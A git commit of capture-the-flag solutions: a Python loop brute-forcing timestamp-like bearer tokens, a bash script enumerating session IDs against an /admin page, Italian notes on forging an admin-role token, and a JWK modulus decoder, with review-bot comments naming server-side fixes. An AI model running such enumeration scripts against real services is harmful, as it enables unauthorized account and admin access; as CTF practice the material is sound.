Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions



@@ -0,0 +1,14 @@
import os
import time
token = 1775846743002
payload = f"curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: 4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001' -H $'Accept-Language: en-US,en;q=0.9' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36' -H $'Authorization: Bearer 1775846743002' -H $'Accept: */*' -H $'Referer: http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/inbox' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
$'http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/api/inbox'"
# os.system(f"{payload} | grep 'messages'")
for i in range(60 * 999):
num = 1775844960000 + i
payload = f"curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: 4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001' -H $'Accept-Language: en-US,en;q=0.9' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36' -H $'Authorization: Bearer {num}' -H $'Accept: */*' -H $'Referer: http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/inbox' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
$'http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/api/inbox'"
os.system(f"echo 'Date: \n{num}\n' && {payload}")
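Review bot: The request is assembled as one shell string and run through `os.system` with `{num}` interpolated into it, and everything before the loop is dead code: `import time`, `token` and the first `payload` are never used, because the only call that referenced them is commented out. Passing an argument list to `subprocess.run([...])`, with the host and the header set held in named constants, would remove the `$'...'` shell quoting and the duplicated header block. `-k` has no effect here because the URL is `http://`. A header comment saying what the script demonstrates would make it usable as a write-up: the bearer token looks like a millisecond timestamp, so it is guessable, and the server-side fix is a token drawn from a CSPRNG, with expiry and rate limiting on `/api/inbox`.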

Submodule web-auth/keyvault/RsaCtfTool added at e261e73888


@@ -0,0 +1,16 @@
import base64
# Example Base64 encoded N value
b64_n = "33dSdlKWda7L8qG94uQHfd21KnwjnbyCyMj44gTS5olb7Aejqsu8fB2lzNJhpWf6bDpFQ3iAWIXjuDQLPHGnQqHasDPEcJdlcQOJn6Sqgj2PnbuE2bBASXEefzjssDJyiZdqMWGRp41E_TlqUcoShkMjf95N_4KlvjsOTb9I99iAA3ouTWcfHA4N7Ln3fzL-BNYlVtbxTCCT-u4kyC0HewrNltZVNiJPV-FxH9FVKvqZQIv-ZCM6EgnXnU9broBZEENIEK02yYvyjqxwPnku96J4MdDItY9qyiNTzSNkHyNK0ds-kagMLT2EP7mR2EAryCv0ZDgJKQlIw4xYH91MKQ"
# 1. Decode the string
# If it's standard Base64:
# n_bytes = base64.urlsafe_b64decode(b64_n)
# If it's Base64URL (common in JWKs):
n_bytes = base64.urlsafe_b64decode(b64_n + "==")
# 2. Convert bytes to integer (Big-Endian)
n_integer = int.from_bytes(n_bytes, byteorder="big")
print(f"Integer Value: {n_integer}")
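Review bot: The comments around the decode step do not match the code: the commented-out line labelled "standard Base64" also calls `urlsafe_b64decode`, where `base64.b64decode(b64_n)` is presumably meant. "Example Base64 encoded N value" also undersells the value, which contains `-` and `_` and so looks like the Base64URL `n` member of a JWK. The fixed `+ "=="` works only because the decoder tolerates surplus padding; `b64_n + "=" * (-len(b64_n) % 4)` states the intent. A one-line comment giving the modulus size, `n_integer.bit_length()`, would help a reader judge whether the key length itself is the weakness.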

Binary file not shown.


Binary file not shown.



@@ -0,0 +1,2 @@
- Aggiornando da settings posso fare delle POST generando qualsiasi token voglio (firmato dal server)
- Faccio una post con role=admin invece che role=player e dopo lo mando a /operator trovando la flag.


@@ -0,0 +1,6 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
too-small-reminder.challs.olicyber.it FALSE / FALSE 0 session_id 1337

8
web-auth/too_small/force.sh Executable file

@@ -0,0 +1,8 @@
#!/bin/bash
for i in $(seq 1 9999);
do
echo "Session id=$i"
curl -b "session_id=$i" http://too-small-reminder.challs.olicyber.it/admin
done
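Review bot: `force.sh` carries no comment saying what it demonstrates, so the lesson is lost to anyone reading the repository later. A header comment could state it: the application apparently uses a small integer as `session_id` (the committed cookie file holds `1337`), so the identifier space is enumerable, and the server-side fix is a long session identifier from a CSPRNG plus rate limiting on `/admin`. On style, `for ((i = 1; i <= 9999; i++))` avoids the subshell and the word-splitting of the `$(seq 1 9999)` output, and the stray `;` after the `for` line can go.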